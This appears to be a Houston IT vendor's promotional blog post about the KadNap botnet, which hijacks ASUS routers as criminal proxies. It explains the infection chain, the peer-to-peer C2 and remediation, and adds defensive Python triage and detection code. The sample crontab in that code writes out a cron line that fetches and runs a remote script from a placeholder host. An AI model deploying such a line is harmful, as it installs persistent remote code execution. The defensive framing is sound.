KadNap Malware Is Turning 14,000 ASUS Routers Into Criminal Proxy Networks
What Houston Businesses Need To Know About Router Security – Edge Device Security For Small And Mid-Sized Businesses
A new botnet exploits unpatched routers to build a takedown-resistant criminal proxy service - and 60% of victims are in the U.S.
Researchers at Lumen's Black Lotus Labs went public this week with findings on KadNap, a malware strain that has quietly conscripted over 14,000 routers and edge networking devices into a criminal proxy botnet. The primary targets are ASUS routers - and over 60% of infected devices sit in the United States. What makes KadNap particularly dangerous for Houston businesses isn't just the infection itself. It's the architecture. This botnet was built from the ground up to resist the exact takedown methods that law enforcement and security teams have relied on for years.
The attackers aren't using zero-day exploits or anything exotic. They're walking through doors that device owners left unlocked by not patching known vulnerabilities. We see this pattern constantly with small and mid-sized businesses across the Houston metro area - routers get plugged in, configured once, and then forgotten for years. That's exactly the kind of environment KadNap thrives in.
KadNap is a botnet malware first detected in August 2025 by Lumen's Black Lotus Labs. The name comes from its use of a custom version of the Kademlia Distributed Hash Table (DHT) protocol - a peer-to-peer system originally designed for legitimate file-sharing networks like BitTorrent. The attackers repurposed this protocol to hide their command-and-control infrastructure inside what looks like normal peer-to-peer traffic.
Here's why that matters. Traditional botnets use centralized command servers. Security teams find those servers, get a court order, and shut them down. Game over. KadNap doesn't work that way. Every infected device talks to other infected devices to find instructions. There's no single server to seize. If defenders block 10 nodes, the other 13,990 keep running.
Key characteristics of KadNap:
- 14,000+ infected devices on an average day, up from 10,000 when first discovered in August 2025
- ASUS routers are the primary target, though other edge devices and IoT hardware are also affected
- Decentralized P2P architecture based on Kademlia DHT protocol makes traditional takedown methods ineffective
- No zero-day exploits required - the malware exploits known vulnerabilities that owners haven't patched
- Survives reboots through a persistent shell script that re-executes automatically on restart
- 60%+ of victims are in the United States, with additional infections in Taiwan, Hong Kong, Russia, the UK, and other countries
Black Lotus Labs researcher Chris Formosa told Ars Technica that the high concentration of ASUS hardware in the botnet likely comes down to the attackers having a reliable exploit for specific ASUS models. Not a sophisticated zero-day - just known bugs that never got patched.
KadNap succeeds because it targets the gap between "we have a router" and "someone is actively managing that router." That's the gap CinchOps fills for Houston-area businesses every day. In 30 years working in IT - including time at Cisco managing network infrastructure at enterprise scale - the pattern behind nearly every router compromise we respond to is the same: firmware that hasn't been updated in years, default credentials still in place, and no one watching the traffic.
CinchOps is a managed IT services provider based in Katy, Texas, serving small and mid-sized businesses across the Houston metro area. CinchOps specializes in cybersecurity, network security, managed IT support, VoIP, and SD-WAN for businesses with 10-200 employees.
Here's how we help protect businesses from threats like KadNap:
- Router and edge device firmware management - We maintain current firmware across all network devices, closing the exact vulnerabilities that KadNap exploits before attackers can reach them
- Network traffic monitoring - Active monitoring catches anomalous outbound connections, unusual peer-to-peer traffic patterns, and communication with known malicious infrastructure
- Hardware lifecycle management - We track which devices are approaching end-of-life and plan replacements before they become unpatchable security liabilities
- Network segmentation - Properly segmented networks limit the blast radius when any single device is compromised, preventing lateral movement across your business infrastructure
- Indicator of compromise (IoC) monitoring - We stay current with published threat intelligence feeds and actively check your environment against known malicious IPs, domains, and file hashes
- Incident response - If a device is compromised, we handle the full remediation: isolation, factory reset, firmware update, reconfiguration, and verification
The businesses that get hit by threats like KadNap are the ones where nobody is watching the router. Don't let your business be one of them. Contact CinchOps for a free security assessment across your Katy, Sugar Land, or greater Houston area business network.
The infection chain starts with a shell script called aic.sh downloaded from a command server. This script does the heavy lifting for initial compromise:
- Creates a cron job that retrieves the malicious script every hour at the 55-minute mark
- Renames the script to .asusrouter - a naming choice designed to blend in with legitimate ASUS processes
- Downloads and executes an ELF binary renamed "kad" - this is the KadNap malware itself
- Samples exist for both ARM and MIPS architectures, covering a wide range of consumer and edge hardware
Once the malware initializes, it takes several steps to embed itself in the network. KadNap checks the device's external IP address, synchronizes time with NTP servers, and then begins the process of joining the peer-to-peer network.
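A host-side triage check for the artifacts just listed, added here as an illustration rather than anything from the report: it parses a crontab and a process listing (both constructed samples, with a TEST-NET placeholder URL) and flags the hourly :55 fetch job, the .asusrouter file name, and a process named kad.

```python
"""Added triage example (not from Black Lotus Labs): look for the persistence artifacts
described above in a router's crontab and process list. All input here is constructed."""
import re

# Constructed samples of what a dump from a compromised device might look like.
SAMPLE_CRONTAB = """\
0 3 * * * /sbin/logrotate.sh
55 * * * * wget -q -O /tmp/.asusrouter http://198.51.100.5/aic.sh && sh /tmp/.asusrouter
"""
SAMPLE_PS = """\
  PID USER       COMMAND
    1 admin      /sbin/init
  412 admin      httpd
  977 admin      /tmp/kad
"""
SUSPICIOUS_NAMES = {".asusrouter", "kad"}          # file/process names named in the write-up
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp)\b")  # a cron job that re-downloads its script

def parse_crontab(text: str) -> list[dict]:
    """Split each crontab line into its schedule fields and the command; skip comments/blanks."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            entries.append({"minute": fields[0], "hour": fields[1], "command": fields[5]})
    return entries

def flag_cron(entries: list[dict]) -> list[str]:
    """Return commands that run hourly at :55 and fetch from the network, or touch a known name."""
    hits = []
    for e in entries:
        hourly_at_55 = e["minute"] == "55" and e["hour"] == "*"
        fetches = FETCH_TOOLS.search(e["command"]) is not None
        # compare basenames of each token so "/tmp/.asusrouter" matches ".asusrouter"
        known_name = any(tok.split("/")[-1] in SUSPICIOUS_NAMES for tok in e["command"].split())
        if (hourly_at_55 and fetches) or known_name:
            hits.append(e["command"])
    return hits

def flag_processes(ps_text: str) -> list[str]:
    """Return command lines from a ps listing whose basename is a known artifact name."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # first line is the column header
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[2].split("/")[-1] in SUSPICIOUS_NAMES:
            hits.append(parts[2])
    return hits
```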
The Kademlia DHT Trick
This is where KadNap gets clever. In a standard Kademlia network, each node gets a unique ID within a 160-bit address space. Each node stores the keys closest to its own ID, and the distance between two IDs is their XOR, compared as an integer. When a node needs to find another, it queries the neighbors it already knows, and each hop returns contacts progressively closer to the target.
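The lookup mechanics described above, as an added toy implementation that is not KadNap's code: XOR distance, per-bucket routing tables, and a hop-by-hop FIND_NODE over a constructed 32-node overlay whose IDs are derived from labels.

```python
"""Toy Kademlia FIND_NODE lookup: XOR distance, k-buckets and hop-by-hop convergence.
Added illustration, not KadNap's code; node IDs are constructed from labels."""
import hashlib

K = 4  # contacts kept per bucket (Kademlia's default is 20); small to force multi-hop lookups

def node_id(label: str) -> int:
    """160-bit node ID derived from a label (stand-in for the random ID a real node picks)."""
    return int.from_bytes(hashlib.sha1(label.encode()).digest(), "big")

def xor_distance(a: int, b: int) -> int:
    """Kademlia distance metric: XOR of the two IDs, compared as an unsigned integer."""
    return a ^ b

def bucket_index(self_id: int, other_id: int) -> int:
    """Bucket = position of the highest bit in which the two IDs differ (0..159)."""
    return xor_distance(self_id, other_id).bit_length() - 1

def build_routing_tables(ids: list[int]) -> dict[int, list[int]]:
    """Each node keeps at most K contacts per bucket, so no node knows the whole overlay."""
    tables = {}
    for me in ids:
        buckets: dict[int, list[int]] = {}
        for other in ids:
            if other != me:
                b = bucket_index(me, other)
                if len(buckets.setdefault(b, [])) < K:
                    buckets[b].append(other)
        tables[me] = [c for contacts in buckets.values() for c in contacts]
    return tables

def lookup(tables: dict[int, list[int]], start: int, target: int) -> list[int]:
    """Simulate FIND_NODE: at every hop move to the current node's contact closest to target.
    Returns the IDs visited; the last one is target on success. Progress is guaranteed because
    every contact in the bucket holding target shares a longer prefix with target than we do."""
    path, current = [start], start
    while current != target:
        nxt = min(tables[current], key=lambda c: xor_distance(c, target))
        if xor_distance(nxt, target) >= xor_distance(current, target):
            break  # no closer contact known: lookup stalls (cannot happen for a live target)
        path.append(nxt)
        current = nxt
    return path

NETWORK = [node_id(f"router-{i}") for i in range(32)]  # constructed 32-node overlay
TABLES = build_routing_tables(NETWORK)

def hops_to(start_idx: int, target_idx: int) -> int:  # hops between two constructed nodes
    return len(lookup(TABLES, NETWORK[start_idx], NETWORK[target_idx])) - 1
```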
KadNap adds a twist: it obtains its initial search key through a BitTorrent node. Black Lotus Labs researcher Chris Formosa described the process in plain terms - infected devices reach out to BitTorrent entry nodes with a secret passphrase, get directed to nearby "neighbors" who point them closer, and eventually arrive at a node that provides the actual command-and-control address. The C2 address is delivered along with a firewall rule file that blocks port 22 (SSH), locking out legitimate administrators.
There's a weakness in the implementation, though. Analysis of KadNap samples going back to August 2025 shows that infected devices consistently contact the same two intermediate nodes before reaching command servers. In a true Kademlia network, those final hops would change over time. This consistency gives defenders a potential detection point.
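A detection rule built on that consistency, as an added example rather than Black Lotus Labs' tooling: it reads flow records in an assumed "timestamp src dst dport proto" format and flags LAN hosts that reach both fixed intermediate nodes or a command server. The indicator addresses are constructed TEST-NET placeholders standing in for the published feed.

```python
"""Added detection example (not Black Lotus Labs' tooling): flag LAN hosts whose outbound
flows show the fixed rendezvous pattern (both constant intermediate nodes, then a C2)."""
from collections import defaultdict

# Placeholder indicators in TEST-NET ranges (constructed); swap in the published IoC feed.
INTERMEDIATE_NODES = {"203.0.113.10", "203.0.113.11"}
C2_SERVERS = {"198.51.100.5", "198.51.100.6"}

# Constructed flow records: "timestamp src dst dport proto" (one flow per line).
SAMPLE_FLOWS = """\
2025-09-01T02:55:01Z 192.168.1.1 203.0.113.10 6881 udp
2025-09-01T02:55:02Z 192.168.1.1 203.0.113.11 6881 udp
2025-09-01T02:55:04Z 192.168.1.1 198.51.100.5 443 tcp
2025-09-01T02:56:10Z 192.168.1.50 203.0.113.10 6881 udp
2025-09-01T03:01:00Z 192.168.1.77 192.0.2.44 443 tcp
2025-09-01T03:55:03Z 192.168.1.23 203.0.113.10 6881 udp
2025-09-01T03:55:05Z 192.168.1.23 203.0.113.11 6881 udp
"""

def parse_flows(text: str) -> list[dict]:
    """Parse flow lines; malformed lines are skipped rather than crashing the job."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or not parts[3].isdigit():
            continue
        ts, src, dst, dport, proto = parts
        flows.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto})
    return flows

def score_hosts(flows: list[dict]) -> dict[str, str]:
    """Per source host, record which intermediates and C2s it reached and give a verdict:
    'c2-contact' (talked to a C2), 'rendezvous-pair' (hit both fixed hops, the signature of
    a device joining the overlay) or 'single-peer' (one hop only; could be benign DHT use)."""
    seen = defaultdict(lambda: {"intermediate": set(), "c2": set()})
    for f in flows:
        if f["dst"] in INTERMEDIATE_NODES:
            seen[f["src"]]["intermediate"].add(f["dst"])
        elif f["dst"] in C2_SERVERS:
            seen[f["src"]]["c2"].add(f["dst"])
    verdicts = {}
    for host, s in seen.items():
        if s["c2"]:
            verdicts[host] = "c2-contact"
        elif s["intermediate"] == INTERMEDIATE_NODES:
            verdicts[host] = "rendezvous-pair"
        else:
            verdicts[host] = "single-peer"
    return verdicts
```

Hosts that never touch an indicator (192.168.1.77 in the sample) are left out of the verdicts entirely, so the output is only the list worth investigating.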
Infrastructure Segmentation
The botnet operators aren't running a flat network. They segment their infrastructure by device type and model. More than half the botnet - the ASUS victims - connects to two ASUS-specific command servers. The remaining infected devices communicate with two separate control servers. This segmentation makes attribution harder and helps the operators manage their criminal infrastructure more efficiently.
The numbers tell a clear story. Over 60% of KadNap infections are concentrated in the United States, with smaller clusters in Taiwan, Hong Kong, Russia, the UK, Australia, Brazil, France, Italy, and Spain. Any business running ASUS routers - or other edge networking and IoT devices - with outdated firmware is a potential target.
Businesses most at risk include:
- Small and mid-sized businesses using consumer-grade routers - SOHO (small office/home office) hardware is the primary target, and many Houston SMBs rely on equipment that's been running the same firmware for years
- Companies with remote workers - Home routers used by remote employees can serve as entry points, and those devices are almost never managed or updated by the company
- Businesses without active network monitoring - KadNap operates silently. Your internet might feel slightly slower, but there's no pop-up, no warning. Netflix still streams. You won't know unless someone is watching your network traffic
- Organizations using end-of-life hardware - Routers that no longer receive firmware updates from the manufacturer are permanently vulnerable
Houston Businesses: Your Router Is Your Front Door
If your business IP address gets associated with criminal proxy traffic - DDoS attacks, credential stuffing, brute-force campaigns - you could face blacklisting, degraded service, and potential legal complications. The victim hosting the traffic typically has no idea it's happening. Proactive managed IT support that includes router firmware management and network monitoring is the difference between catching this early and finding out the hard way.
KadNap isn't just about building a botnet for the sake of it. The infected devices are monetized through a criminal proxy service called Doppelganger, operating at doppelganger[.]shop. This service sells access to hijacked routers as "residential proxies" in over 50 countries, advertising "100% anonymity."
Security researchers believe Doppelganger is a direct rebrand of Faceless, a notorious proxy service that previously ran on devices compromised by the TheMoon malware - which also targeted ASUS routers. Doppelganger appears to have launched in May or June 2025, roughly two months before KadNap infections first appeared in the wild.
What criminals use these proxies for:
- Distributed denial-of-service (DDoS) attacks - overwhelming target servers with traffic from thousands of residential IP addresses
- Credential stuffing campaigns - testing stolen username/password combinations against login pages while hiding behind clean residential IPs
- Brute-force attacks - systematically guessing passwords against targeted accounts
- Traffic anonymization - hiding the origin of malicious activity behind legitimate business and home connections
The residential IP angle is what makes this particularly dangerous. When malicious traffic comes from what looks like a normal home or small business internet connection in Katy or Sugar Land, security tools have a much harder time distinguishing it from legitimate traffic. Your router becomes an unwitting accomplice in someone else's cybercrime operation.
This is the part that trips people up. Rebooting your router does not remove KadNap. The malware stores a shell script that automatically re-executes when a compromised router restarts. Power cycling changes nothing. The device comes back online and immediately reconnects to the botnet.
Here's what's actually required to clean an infected device:
- Perform a full factory reset - not just a reboot, but a complete reset to factory defaults that wipes all stored scripts and configurations
- Update firmware immediately after reset - install all available patches from the manufacturer before reconnecting to the internet
- Set a strong administrative password - replace any default credentials with a complex password that hasn't been used elsewhere
- Disable remote management - turn off remote access to the router's admin interface unless you have a specific, documented need for it
- Check Black Lotus Labs' indicators of compromise - review your router logs for connections to known KadNap command-and-control IP addresses
- Replace end-of-life hardware - if your router no longer receives firmware updates from the manufacturer, no amount of patching will help. Replace it
Lumen has proactively blocked all network traffic to and from KadNap's control infrastructure within their own network. They're also distributing indicators of compromise through public feeds so other organizations can block access on their end. But if you're running a vulnerable, unpatched ASUS router on a non-Lumen connection, you're still exposed.
Prevention Going Forward
The best defense against threats like KadNap is the same defense that works against 90% of network threats: keep your firmware updated, replace hardware that's past its support lifecycle, and have someone actively monitoring your network traffic for anomalies. None of that happens by itself.
❓ Frequently Asked Questions
What is the KadNap malware and how does it infect routers?
KadNap is a botnet malware discovered by Lumen's Black Lotus Labs that primarily targets ASUS routers by exploiting known, unpatched vulnerabilities. Once infected, routers are enrolled into a peer-to-peer network and used as anonymous proxies for criminal traffic. The malware persists through reboots using a scheduled shell script that automatically re-executes on restart.
How do I know if my ASUS router is infected with KadNap?
Black Lotus Labs has published a list of IP addresses and file hashes associated with KadNap infections. Business owners should check router logs for connections to known command-and-control servers. Unusual outbound traffic patterns, slightly degraded network performance, and connections on non-standard peer-to-peer ports can also indicate infection.
Will rebooting my router remove KadNap malware?
No. KadNap stores a shell script that automatically re-executes when the router restarts, so a simple reboot will not remove the infection. Cleaning a compromised router requires a full factory reset, followed by firmware updates, a strong administrative password, and disabling remote access unless absolutely necessary.
What makes KadNap different from other botnet malware?
KadNap uses a custom version of the Kademlia Distributed Hash Table protocol to create a decentralized peer-to-peer command structure. Unlike traditional botnets that rely on centralized servers that can be seized, KadNap hides its command infrastructure within distributed P2P traffic, making it extremely difficult for defenders to detect, block, or dismantle.
How can a managed IT provider help protect my business from router-based threats like KadNap?
A managed IT services provider like CinchOps monitors network traffic for anomalous behavior, manages firmware updates across all edge devices, segments networks to limit lateral movement, and replaces end-of-life hardware before it becomes a liability. Proactive management closes the exact gaps that threats like KadNap are designed to exploit.
Know Your Business Security Score
Get a FREE comprehensive security assessment for your Houston area business. Understand vulnerabilities across your network, applications, DNS, and more.
📄 Sources
- KadNap botnet discovery, 14,000+ infected devices, Doppelganger proxy service connection - Lumen Black Lotus Labs Research Report
- Chris Formosa interview on exploit methods and takedown resistance - Ars Technica
- KadNap technical analysis, geographic distribution, and Doppelganger connection - The Hacker News
- Botnet architecture details and Faceless proxy service rebrand analysis - BleepingComputer